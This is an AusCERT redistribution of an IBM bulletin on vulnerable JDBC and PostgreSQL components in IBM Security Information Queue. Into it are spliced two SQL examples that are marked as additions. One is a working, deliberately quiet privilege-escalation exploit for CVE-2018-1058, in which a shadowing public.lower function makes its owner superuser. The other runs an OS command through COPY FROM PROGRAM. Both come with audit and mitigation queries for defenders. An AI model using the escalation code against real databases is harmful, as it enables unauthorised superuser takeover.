Operating System: Linux

Published: 28 January 2020

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2020.0271
Security Bulletin: IBM Security Information Queue uses database components
         with known vulnerabilities (CVE-2016-3506, CVE-2018-1058,
                      CVE-2018-10936, CVE-2019-9193)
                              28 January 2020

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           IBM Security Information Queue
Publisher:         IBM
Operating System:  Linux variants
Impact/Access:     Execute Arbitrary Code/Commands -- Remote/Unauthenticated
                   Administrator Compromise        -- Existing Account      
                   Denial of Service               -- Remote/Unauthenticated
                   Provide Misleading Information  -- Remote/Unauthenticated
                   Access Confidential Data        -- Remote/Unauthenticated
Resolution:        Patch/Upgrade
CVE Names:         CVE-2019-9193 CVE-2018-10936 CVE-2018-1058
                   CVE-2016-3506  

Reference:         ASB-2018.0174
                   ASB-2018.0089

Original Bulletin: 
   https://www.ibm.com/support/pages/node/1282324

- --------------------------BEGIN INCLUDED TEXT--------------------

IBM Security Information Queue uses database components with known
vulnerabilities (CVE-2016-3506, CVE-2018-1058, CVE-2018-10936, CVE-2019-9193)

Security Bulletin

Summary

IBM Security Information Queue (ISIQ) bundles older Oracle JDBC and
PostgreSQL JAR files that carry known vulnerabilities. ISIQ 1.0.5 and later
ship updated versions of these JAR files that are not affected by the CVEs
listed below.

Vulnerability Details

CVEID: CVE-2016-3506
DESCRIPTION: Unspecified vulnerability in the JDBC component in Oracle Database
Server 11.2.0.4, 12.1.0.1, and 12.1.0.2; the Oracle Retail Xstore Point of
Service 5.5, 6.0, 6.5, 7.0, 7.1, 15.0, and 16.0; the Oracle Retail Warehouse
Management System 14.04, 14.1.3, and 15.0.1; the Oracle Retail Workforce
Management 1.60.7, and 1.64.0; the Oracle Retail Clearance Optimization Engine
13.4; the Oracle Retail Markdown Optimization 13.4 and 14.0; and Oracle Retail
Merchandising System 16.0 allows remote attackers to affect confidentiality,
integrity, and availability via unknown vectors.
CVSS Base score: 8.1
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/115131
for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

CVEID: CVE-2018-1058
DESCRIPTION: A flaw was found in the way Postgresql allowed a user to modify
the behavior of a query for other users. An attacker with a user account could
use this flaw to execute code with the permissions of superuser in the
database. Versions 9.3 through 10 are affected.
CVSS Base score: 6.3
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/139844
for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)
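The shadowing mechanism behind CVE-2018-1058, as an added example that is not
part of the IBM bulletin and not ISIQ code. The CVE describes server-side
behaviour: with the pre-fix defaults every role can CREATE in the public
schema, and PostgreSQL resolves an unqualified function call to the candidate
whose argument types match exactly in preference to one that needs a cast,
whatever position the schema holds in search_path. An unprivileged user can
therefore plant an overload that a superuser's routine query resolves to. The
roles attacker and postgres, the customers table and the payload are
constructed for illustration; the mitigation commands are the ones the
PostgreSQL project published with the fix. These settings live on the
database server, so they are worth checking independently of the JAR upgrade
the bulletin prescribes.

```sql
-- Added example, not from the IBM/AusCERT bulletin. Role and table names
-- (attacker, customers) are constructed for illustration; postgres is the
-- default superuser role. Tested logic applies to PostgreSQL 9.3 through 10
-- with the pre-fix default of CREATE on schema public granted to PUBLIC.

-- ---- setup, as a superuser: a table with a varchar column that admins query
CREATE TABLE public.customers (id int, name varchar(64));
INSERT INTO public.customers VALUES (1, 'Alice'), (2, 'Bob');
CREATE ROLE attacker LOGIN NOSUPERUSER PASSWORD 'x';

-- ---- as attacker, holding nothing beyond CONNECT and the default CREATE on public.
-- pg_catalog.lower(text) exists; this overload takes varchar, so the call
-- lower(<varchar column>) resolves here without a cast even though pg_catalog
-- is searched first. SECURITY INVOKER is the default, so the body runs with
-- the privileges of whoever calls it.
CREATE FUNCTION public.lower(varchar) RETURNS text
LANGUAGE plpgsql AS $$
BEGIN
    -- stay quiet for ordinary callers; escalate only when a superuser calls
    IF pg_catalog.current_setting('is_superuser') = 'on' THEN
        ALTER ROLE attacker SUPERUSER;
    END IF;
    RETURN pg_catalog.lower($1::text);   -- return the expected value so nothing looks wrong
END
$$;

-- ---- as a superuser, a routine query under the default search_path ("$user", public)
SELECT lower(name) FROM customers;
SELECT rolsuper FROM pg_catalog.pg_roles WHERE rolname = 'attacker';   -- now t

-- ---- mitigation, as a superuser
DROP FUNCTION public.lower(varchar);
ALTER ROLE attacker NOSUPERUSER;
REVOKE CREATE ON SCHEMA public FROM PUBLIC;   -- only the schema owner creates in public
-- keep public out of the search path of privileged roles (repeat per role),
-- and schema-qualify tables in public from those sessions
ALTER ROLE postgres SET search_path = pg_catalog, "$user";
SELECT pg_catalog.lower(name) FROM public.customers;

-- ---- audit: functions in public whose names shadow pg_catalog functions
SELECT p.proname,
       pg_catalog.pg_get_function_identity_arguments(p.oid) AS args,
       pg_catalog.pg_get_userbyid(p.proowner)               AS owner
FROM pg_catalog.pg_proc p
JOIN pg_catalog.pg_namespace n ON n.oid = p.pronamespace
WHERE n.nspname = 'public'
  AND EXISTS (SELECT 1
              FROM pg_catalog.pg_proc c
              JOIN pg_catalog.pg_namespace cn ON cn.oid = c.pronamespace
              WHERE cn.nspname = 'pg_catalog' AND c.proname = p.proname);
```

The audit query is the part to keep: run it as part of a regular review, because
REVOKE CREATE does nothing about functions that were planted before it took
effect, and SECURITY DEFINER functions should additionally carry their own
`SET search_path = pg_catalog` so the caller's path cannot redirect them.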

CVEID: CVE-2018-10936
DESCRIPTION: A weakness was found in postgresql-jdbc before version 42.2.5. It
was possible to provide an SSL Factory and not check the host name if a host
name verifier was not provided to the driver. This could lead to a condition
where a man-in-the-middle attacker could masquerade as a trusted server by
providing a certificate for the wrong host, as long as it was signed by a
trusted CA.
CVSS Base score: 5.9
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/149157
for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N)

CVEID: CVE-2019-9193
DESCRIPTION: ** DISPUTED ** In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM
PROGRAM" function allows superusers and users in the
'pg_execute_server_program' group to execute arbitrary code in the context of
the database's operating system user. This functionality is enabled by default
and can be abused to run arbitrary operating system commands on Windows, Linux,
and macOS. NOTE: Third parties claim/state this is not an issue because
PostgreSQL functionality for COPY TO/FROM PROGRAM is acting as intended.
References state that in PostgreSQL, a superuser can execute commands as the
server user without using the COPY FROM PROGRAM.
CVSS Base score: 7.8
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/159212
for the current score.
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
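Who can reach COPY TO/FROM PROGRAM, as an added example that is not part of
the IBM bulletin and not ISIQ code. Whether or not one treats CVE-2019-9193 as
a vulnerability, the capability is gated purely on role privilege inside the
server, so for a product such as ISIQ the practical control is that the
account it connects with is not a superuser and, on PostgreSQL 11 and later,
not a member of pg_execute_server_program. The role app_user is constructed
for illustration; the audit query reports direct role membership only.

```sql
-- Added example, not from the IBM/AusCERT bulletin. app_user is a constructed
-- role name; substitute the account your application connects as.

-- ---- what the capability does, as a superuser (PostgreSQL 9.3 and later)
CREATE TEMP TABLE cmd_output (line text);
COPY cmd_output FROM PROGRAM 'id';   -- runs under the OS account the server runs as
SELECT line FROM cmd_output;         -- e.g. uid=26(postgres) gid=26(postgres) ...

-- ---- audit: every role that can reach it.
-- Superusers always can; from PostgreSQL 11 on, so can members of
-- pg_execute_server_program. The subquery yields NULL on versions where that
-- role does not exist, so the LEFT JOIN then matches nothing and only
-- superusers are listed.
SELECT r.rolname,
       r.rolsuper,
       m.member IS NOT NULL AS in_pg_execute_server_program
FROM pg_catalog.pg_roles r
LEFT JOIN pg_catalog.pg_auth_members m
       ON m.member = r.oid
      AND m.roleid = (SELECT oid FROM pg_catalog.pg_roles
                      WHERE rolname = 'pg_execute_server_program')
WHERE r.rolsuper OR m.member IS NOT NULL
ORDER BY r.rolname;

-- ---- remediation for an application account that appears in that list
ALTER ROLE app_user NOSUPERUSER;
REVOKE pg_execute_server_program FROM app_user;   -- PostgreSQL 11 and later only

-- ---- confirm the account now fails closed (same session, still a superuser)
SET ROLE app_user;
COPY cmd_output FROM PROGRAM 'id';   -- rejected: needs superuser, or
                                     -- pg_execute_server_program membership on 11+
RESET ROLE;
```

Membership is transitive in PostgreSQL, so a role that reaches
pg_execute_server_program through an intermediate group will not show up in
the join above; pg_has_role() resolves that, but it raises an error on servers
where the role does not exist, which is why the join form is used here.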

Affected Products and Versions

+-------------------------------------+---------------------------------+
|Affected Product(s)                  |Version(s)                       |
+-------------------------------------+---------------------------------+
|IBM Security Information Queue (ISIQ)|1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4|
+-------------------------------------+---------------------------------+

Remediation/Fixes

Download and install the latest IBM Security Information Queue images (tagged
at 1.0.5 or greater) from the Docker Hub repository. The instructions for
accessing and deploying the images can be found on the ISIQ starter kit page:
https://www.ibm.com/support/pages/ibm-security-information-queue-starter-kit

Workarounds and Mitigations

None

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
-----END PGP SIGNATURE-----